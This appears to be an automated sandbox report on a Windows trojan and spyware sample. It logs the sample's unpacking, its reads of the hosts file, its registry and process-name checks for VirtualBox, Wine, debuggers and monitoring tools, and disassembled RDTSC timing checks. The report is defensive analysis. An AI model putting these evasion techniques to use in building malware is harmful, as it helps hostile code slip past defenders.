Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: String function: 006CCAA0 appears 64 times
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: String function: 006C73F0 appears 114 times
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: String function: 006CC960 appears 37 times
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: String function: 007A44A0 appears 76 times
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: String function: 007050A0 appears 101 times
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: String function: 00877220 appears 103 times
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: String function: 006C75A0 appears 707 times
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: String function: 006DCCD0 appears 55 times
Source: xdeRtWCeNH.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: xdeRtWCeNH.exeStatic PE information: Section: kzctzxho ZLIB complexity 0.9944327230730515
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_006C255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_006C255D
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_006C29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_006C29FF
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: xdeRtWCeNH.exeVirustotal: Detection: 47%
Source: xdeRtWCeNH.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: xdeRtWCeNH.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeSection loaded: kernel.appcore.dllJump to behavior
Source: xdeRtWCeNH.exeStatic file information: File size 4452352 > 1048576
Source: xdeRtWCeNH.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x288a00
Source: xdeRtWCeNH.exeStatic PE information: Raw size of kzctzxho is bigger than: 0x100000 < 0x1b2a00

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeUnpacked PE file: 0.2.xdeRtWCeNH.exe.6c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kzctzxho:EW;czecwivl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;kzctzxho:EW;czecwivl:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: xdeRtWCeNH.exeStatic PE information: real checksum: 0x44da9f should be: 0x446cd1
Source: xdeRtWCeNH.exeStatic PE information: section name:
Source: xdeRtWCeNH.exeStatic PE information: section name: .idata
Source: xdeRtWCeNH.exeStatic PE information: section name:
Source: xdeRtWCeNH.exeStatic PE information: section name: kzctzxho
Source: xdeRtWCeNH.exeStatic PE information: section name: czecwivl
Source: xdeRtWCeNH.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_3_01AACF92 pushfd ; iretd 0_3_01AACF99
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_3_01AACF92 pushfd ; iretd 0_3_01AACF99
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_3_01AADED4 pushad ; iretd 0_3_01AADF52
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_3_01AADED4 pushad ; iretd 0_3_01AADF52
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_3_01AACF92 pushfd ; iretd 0_3_01AACF99
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_3_01AACF92 pushfd ; iretd 0_3_01AACF99
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_3_01AADED4 pushad ; iretd 0_3_01AADF52
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_3_01AADED4 pushad ; iretd 0_3_01AADF52
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_3_01AACF92 pushfd ; iretd 0_3_01AACF99
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_3_01AACF92 pushfd ; iretd 0_3_01AACF99
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_3_01AADED4 pushad ; iretd 0_3_01AADF52
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_3_01AADED4 pushad ; iretd 0_3_01AADF52
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_00A441D0 push eax; mov dword ptr [esp], edx0_2_00A441D5
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_00742340 push eax; mov dword ptr [esp], 00000000h0_2_00742343
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_0077C7F0 push eax; mov dword ptr [esp], 00000000h0_2_0077C743
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_00700AC0 push eax; mov dword ptr [esp], 00000000h0_2_00700AC4
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_00721430 push eax; mov dword ptr [esp], 00000000h0_2_00721433
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_007439A0 push eax; mov dword ptr [esp], 00000000h0_2_007439A3
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_0071DAD0 push eax; mov dword ptr [esp], edx0_2_0071DAD1
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeCode function: 0_2_00A49F40 push dword ptr [eax+04h]; ret 0_2_00A49F6F
Source: xdeRtWCeNH.exeStatic PE information: section name: kzctzxho entropy: 7.955934839357001

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeWindow searched: window name: RegmonclassJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: xdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
Source: xdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
Source: xdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WINDBG.EXE
Source: xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: xdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F11146 second address: F11153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FAD4CB4B576h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F19BE3 second address: F19BE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F1CC61 second address: F1CCB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 mov ecx, eax 0x0000000b push 00000000h 0x0000000d jmp 00007FAD4CB4B588h 0x00000012 movsx edx, di 0x00000015 call 00007FAD4CB4B579h 0x0000001a jmp 00007FAD4CB4B587h 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jg 00007FAD4CB4B576h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F1CCB4 second address: F1CCBA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F1CCBA second address: F1CCC4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAD4CB4B57Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F1CCC4 second address: F1CCEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007FAD4CB7BFFDh 0x0000000f mov eax, dword ptr [eax] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FAD4CB7C000h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F1CCEF second address: F1CCF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F1CCF5 second address: F1CCF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F1CE02 second address: F1CE08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F1CE08 second address: F1CE0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F1CE0C second address: F1CE95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B588h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FAD4CB4B578h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov esi, dword ptr [ebp+122D1887h] 0x0000002c push 00000000h 0x0000002e and di, B631h 0x00000033 call 00007FAD4CB4B579h 0x00000038 jmp 00007FAD4CB4B582h 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FAD4CB4B588h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F1CE95 second address: F1CE99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F1CE99 second address: F1CE9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F1CE9F second address: F1CEA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F1CEA6 second address: F1CEC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAD4CB4B583h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F1CEC6 second address: F1CEEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FAD4CB7C007h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F1CEEA second address: F1CF00 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAD4CB4B576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAD4CB4B57Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F1CF00 second address: F1CF94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jmp 00007FAD4CB7C003h 0x00000010 pop eax 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007FAD4CB7BFF8h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b pushad 0x0000002c call 00007FAD4CB7BFFFh 0x00000031 mov ebx, 1472F808h 0x00000036 pop edx 0x00000037 mov ebx, 603E5D85h 0x0000003c popad 0x0000003d push 00000003h 0x0000003f js 00007FAD4CB7BFFCh 0x00000045 mov edx, dword ptr [ebp+122D2DA6h] 0x0000004b push 00000000h 0x0000004d pushad 0x0000004e jg 00007FAD4CB7BFFBh 0x00000054 sub edx, dword ptr [ebp+122D3957h] 0x0000005a popad 0x0000005b push 00000003h 0x0000005d mov dword ptr [ebp+122D2D21h], eax 0x00000063 push 8BC8EAE7h 0x00000068 push esi 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F1CF94 second address: F1CF98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F1D00B second address: F1D011 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F1D0D2 second address: F1D0D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F0F78B second address: F0F7AA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAD4CB7BFF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FAD4CB7BFF8h 0x00000010 push esi 0x00000011 pop esi 0x00000012 jns 00007FAD4CB7BFF8h 0x00000018 popad 0x00000019 pushad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F0F7AA second address: F0F7B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F3A9AD second address: F3A9B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F3AB2F second address: F3AB62 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FAD4CB4B5A9h 0x0000000c jmp 00007FAD4CB4B587h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FAD4CB4B57Eh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F3AB62 second address: F3AB66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F3ACE7 second address: F3AD0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAD4CB4B586h 0x00000008 jng 00007FAD4CB4B576h 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F3AD0E second address: F3AD14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F3AD14 second address: F3AD25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007FAD4CB4B57Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F3AD25 second address: F3AD2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F3AEBD second address: F3AEE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD4CB4B57Ch 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAD4CB4B583h 0x00000011 jno 00007FAD4CB4B576h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F3B317 second address: F3B325 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAD4CB7BFF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F3B325 second address: F3B33B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAD4CB4B576h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007FAD4CB4B576h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F3B33B second address: F3B35D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FAD4CB7BFFEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAD4CB7BFFCh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F3B789 second address: F3B78E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F3B8F1 second address: F3B905 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007FAD4CB7BFF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007FAD4CB7BFFCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F3BB87 second address: F3BB8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F33BE1 second address: F33BF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007FAD4CB7BFF6h 0x0000000c popad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F33BF1 second address: F33BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F0A6DA second address: F0A700 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FAD4CB7C010h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F0A700 second address: F0A70A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FAD4CB4B576h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F3BD0C second address: F3BD10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F3C312 second address: F3C331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD4CB4B589h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F3C331 second address: F3C34A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007FAD4CB7BFFCh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F3C34A second address: F3C361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FAD4CB4B576h 0x0000000a jnl 00007FAD4CB4B576h 0x00000010 jp 00007FAD4CB4B576h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F3C361 second address: F3C37E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7C008h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F3C37E second address: F3C384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
